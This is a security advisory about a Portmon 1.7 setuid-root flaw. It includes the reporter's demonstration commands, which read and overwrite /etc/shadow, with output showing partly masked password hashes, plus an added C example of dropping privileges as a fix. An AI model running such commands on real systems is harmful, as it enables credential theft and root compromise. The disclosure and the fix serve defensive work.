Portmon Lets Local Users Read and Write Arbitrary Files With Root Privileges
|
|
SecurityTracker Alert ID: 1007010
|
|
CVE Reference: CAN-2003-0448
|
Updated: Jan 8 2004
|
Original Entry Date: Jun 19 2003
|
Impact: Disclosure of system information, Disclosure of user information, Modification of system information, Modification of user information, Root access via local system
|
Exploit Included: Yes
|
Version(s): 1.7 and possibly prior versions
|
Description: A vulnerability was reported in Portmon. A local user can read from and write to arbitrary files on the system.
It is reported that a local user can invoke Portmon and specify a configuration file or log file command line option to view the contents of, or write to, any file on the system. Because Portmon is typically configured with set user id (setuid) root privileges, a local user can write files with root privileges and potentially gain root access on the system.
Some demonstration exploit commands are provided:
portmon -c /etc/shadow
portmon -l /etc/shadow
|
Impact: A local user can read arbitrary files on the system. A local user can cause certain text to be written to arbitrary files on the system.
|
Solution: No solution was available at the time of this entry.
|
Vendor URL: aboleo.net/software/portmon/
|
Cause: Access control error, Input validation error
|
Underlying OS: Linux (Any), UNIX (Any)
|
Reported By: Luca Ercoli <luca.ercoli@inwind.it>
|
Message History:
This archive entry has one or more follow-up message(s) listed below.
|
Source Message Contents
|
Date: 16 Jun 2003 23:54:33 -0000
From: Luca Ercoli <luca.ercoli@inwind.it>
Subject: Portmon file arbitrary read/write access vulnerability
|
Package: Portmon
Auth: http://www.aboleo.net/
Version(s): 1.7 (prior ?)
Vulnerability: File arbitrary read/write access vulnerability
Portmon is a network service monitoring daemon (http://www.aboleo.net/software/portmon/).
"In order to use ping support, Portmon must run as root or be installed setuid with root permissions due to the fact that it must open up a raw socket."
The product suffers from a security problem that allows any local user to read/write protected files on the system.
This is due to a hole in the way the program handles loading of two configuration files: host file/log file.
Example (read):
[lucae@linux lucae]$portmon -c /etc/shadow
Unable to resolve hostname root:$1$nsqR6sX$ItXXXXXXXXXXXXXXXXX.:12172:0:99999:7:::
Unable to resolve hostname bin:*:12172:0:99999:7:::
Unable to resolve hostname daemon:*:12172:0:99999:7:::
Unable to resolve hostname adm:*:12172:0:99999:7:::
Unable to resolve hostname lp:*:12172:0:99999:7:::
Unable to resolve hostname sync:*:12172:0:99999:7:::
Unable to resolve hostname shutdown:*:12172:0:99999:7:::
Unable to resolve hostname halt:*:12172:0:99999:7:::
Unable to resolve hostname mail:*:12172:0:99999:7:::
Unable to resolve hostname news:*:12172:0:99999:7:::
<snip>
Example (write):
[lucae@linux lucae]$portmon -l /etc/shadow
fopen: No such file or directory
Failed reading config file hosts
[root@linux root]#cat /etc/shadow
<snip>
lucae:$1$w3IGpzV4$i8WcXXXXXXXXXXXXXXXX/:12172:0:99999:7:::
nessus:$1$XSaW3b5e$WWzXXXXXXXXXXXXXXXX.:12183:0:99999:7:::
test:$1$6r5/OoES$RX3OXXXXXXXXXXXXXXXX/:12200:0:99999:7:::
(Mon Jun 16 01:40:17 2003) - Portmon started by user lucae //line added
[root@linux root]#
Luca Ercoli luca.ercoli[at]inwind.it
|
|
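Added example (not part of the advisory and not Portmon source code): one way a setuid-root monitor can avoid this class of bug, assuming, as the documentation quoted above says, that root is needed only to open the raw socket. The helper names drop_to_invoker and open_user_path are hypothetical.

```c
#define _POSIX_C_SOURCE 200809L
#include <fcntl.h>
#include <netinet/in.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <unistd.h>

/* Hypothetical helper: permanently become the invoking user.
 * Returns 0 on success, -1 if a step fails or root can be regained. */
int drop_to_invoker(void)
{
    uid_t ruid = getuid();
    gid_t rgid = getgid();

    if (setgid(rgid) != 0)   /* group first, while still privileged */
        return -1;
    if (setuid(ruid) != 0)   /* as root: sets real, effective and saved uid */
        return -1;
    if (ruid != 0 && seteuid(0) == 0)
        return -1;           /* drop was reversible: fail closed */
    return (geteuid() == ruid && getegid() == rgid) ? 0 : -1;
}

/* Hypothetical helper: open a user-supplied path only once no extra
 * privilege remains, so the kernel checks the invoker's own rights. */
int open_user_path(const char *path, int flags)
{
    if (geteuid() != getuid() || getegid() != getgid())
        return -1;
    return open(path, flags, 0600);
}

int main(int argc, char **argv)
{
    /* Assumed to be the only step needing root: the raw ICMP socket. */
    int raw = socket(AF_INET, SOCK_RAW, IPPROTO_ICMP);
    if (raw < 0)
        perror("raw socket (ping checks unavailable)");
    if (drop_to_invoker() != 0)
        return EXIT_FAILURE;
    /* The -c / -l style path is opened only now, as the invoking user. */
    const char *log = argc > 1 ? argv[1] : "/dev/null";
    int fd = open_user_path(log, O_WRONLY | O_APPEND);
    if (fd < 0)
        perror(log);
    return fd < 0 ? EXIT_FAILURE : EXIT_SUCCESS;
}
```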